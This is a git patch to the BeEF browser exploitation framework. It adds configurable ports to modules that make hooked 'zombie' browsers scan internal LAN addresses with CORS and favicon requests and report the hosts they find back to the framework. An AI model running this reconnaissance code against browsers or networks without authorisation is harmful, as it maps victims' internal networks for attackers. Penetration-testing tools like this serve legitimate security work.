From 0afac0171d195e5aad23c83c4f93593676be401f Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 7 Feb 2015 12:51:00 +0000 Subject: [PATCH] Make ports configurable --- .../ui/panel/tabs/ZombieTabNetwork.js | 90 ++++++++++++++----- .../network/cross_origin_scanner/command.js | 19 ++-- .../network/cross_origin_scanner/module.rb | 1 + modules/network/get_http_servers/command.js | 11 ++- modules/network/get_http_servers/module.rb | 2 +- 5 files changed, 94 insertions(+), 29 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index 9effc1d18..1d5fc3103 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js @@ -174,10 +174,15 @@ ZombieTab_Network = function(zombie) { handler: function() { var mod_name = "get_http_servers"; var mod_id = get_module_id(mod_name); - commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":"common"}), + data: JSON.stringify({"ipRange":"common","ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -200,12 +205,17 @@ ZombieTab_Network = function(zombie) { commands_statusbar.update_fail('Cancelled'); return; } + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } var mod_name = "get_http_servers"; var mod_id = get_module_id(mod_name); commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip_range}), + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -290,10 +300,15 @@ ZombieTab_Network = function(zombie) { handler: function() { var mod_name = "cross_origin_scanner"; var mod_id = get_module_id(mod_name); - commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":"common"}), + data: JSON.stringify({"ipRange":"common","ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -316,12 +331,17 @@ ZombieTab_Network = function(zombie) { commands_statusbar.update_fail('Cancelled'); return; } + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } var mod_name = "cross_origin_scanner"; var mod_id = get_module_id(mod_name); - commands_statusbar.update_sending('CORS scanning ' + ip_range + '...'); + commands_statusbar.update_sending('CORS scanning ' + ip_range + ' [ports: ' + ports + '] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip_range}), + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -365,10 +385,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-host', handler: function() { var mod_id = get_module_id("get_http_servers"); - commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip}), + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -423,10 +448,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-host', handler: function() { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('CORS scanning ' + ip + ' [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip}), + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -515,10 +545,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-host', handler: function() { var mod_id = get_module_id("get_http_servers"); - commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip}), + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -536,11 +571,16 @@ ZombieTab_Network = function(zombie) { text: 'Network ('+class_c+'.0/24)', iconCls: 'network-host-ctxMenu-network', handler: function() { + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } var mod_id = get_module_id("get_http_servers"); - commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...'); + commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip_range}), + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -617,10 +657,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-host', handler: function() { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('CORS scanning ' + ip + ' [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip}), + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -639,10 +684,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-network', handler: function() { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip_range + '...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('CORS scanning ' + ip_range + ' [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip_range}), + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -842,7 +892,7 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-cors', handler: function () { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + commands_statusbar.update_sending('CORS scanning ' + ip + ' [port: '+port+'] ...'); $jwterm.ajax({ contentType: 'application/json', data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js index 382dc5f17..7758d0955 100644 --- a/modules/network/cross_origin_scanner/command.js +++ b/modules/network/cross_origin_scanner/command.js @@ -8,6 +8,7 @@ beef.execute(function() { var ips = new Array(); var ipRange = "<%= @ipRange %>"; + var ports = "<%= @ports %>"; var threads = "<%= @threads %>"; var wait = 2; @@ -16,6 +17,11 @@ beef.execute(function() { return; } + // set target ports + if (ports != null) { + ports = ports.split(','); + } + // set target IP addresses if (ipRange == 'common') { // use default IPs @@ -84,7 +90,7 @@ beef.execute(function() { } - beef.debug("[Cross-Origin Scanner] Starting CORS scan ("+ips.length+" URLs / "+threads+" workers)"); + beef.debug("[Cross-Origin Scanner] Starting CORS scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); // create worker queue var workers = new Array(); @@ -94,19 +100,20 @@ beef.execute(function() { // send CORS request to each IP var proto = 'http'; - var port = 80; for (var i=0; i < ips.length; i++) { var worker = workers[i % threads]; - var url = proto + '://' + ips[i] + ':' + port; - worker.queue('beef.net.cors.request(' + + for (var p=0; p < ports.length; p++) { + var url = proto + '://' + ips[i] + ':' + ports[p]; + worker.queue('beef.net.cors.request(' + '"GET", "'+url+'", "", function(response) {' + 'if (response != null && response["status"] != 0) {' + 'beef.debug("[Cross-Origin Scanner] Received response from '+url+': " + JSON.stringify(response));' + 'var title = response["body"].match("(.*?)<\\/title>"); if (title != null) title = title[1];' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+port+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + '}' + '});' - ); + ); + } } }); diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb index dc7804ddb..4eecf1d9e 100644 --- a/modules/network/cross_origin_scanner/module.rb +++ b/modules/network/cross_origin_scanner/module.rb @@ -33,6 +33,7 @@ class Cross_origin_scanner < BeEF::Core::Command def self.options return [ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, + {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'} ] end diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js index c1e9eabfb..3c67da129 100644 --- a/modules/network/get_http_servers/command.js +++ b/modules/network/get_http_servers/command.js @@ -9,12 +9,17 @@ beef.execute(function() { var ips = new Array(); var proto = 'http'; var ipRange = "<%= @ipRange %>"; - var port = "<%= @rport %>"; + var ports = "<%= @ports %>"; var timeout = "<%= @timeout %>"; var wait = "<%= @wait %>"; var threads = "<%= @threads %>"; var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png'); + // set target ports + if (ports != null) { + ports = ports.split(','); + } + // set target IP addresses if (ipRange == 'common') { // use default IPs @@ -116,7 +121,9 @@ beef.execute(function() { var worker = workers[u % threads]; // for each LAN IP address for (var i=0; i < ips.length; i++) { - worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+port+'","'+urls[u]+'");'); + for (var p=0; p < ports.length; p++) { + worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+ports[p]+'","'+urls[u]+'");'); + } } } diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb index 31c5846ed..18819613d 100644 --- a/modules/network/get_http_servers/module.rb +++ b/modules/network/get_http_servers/module.rb @@ -9,7 +9,7 @@ class Get_http_servers < BeEF::Core::Command def self.options return [ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, - {'name' => 'rport', 'ui_label' => 'Port', 'value' => '80'}, + {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'}, {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '1'}, {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}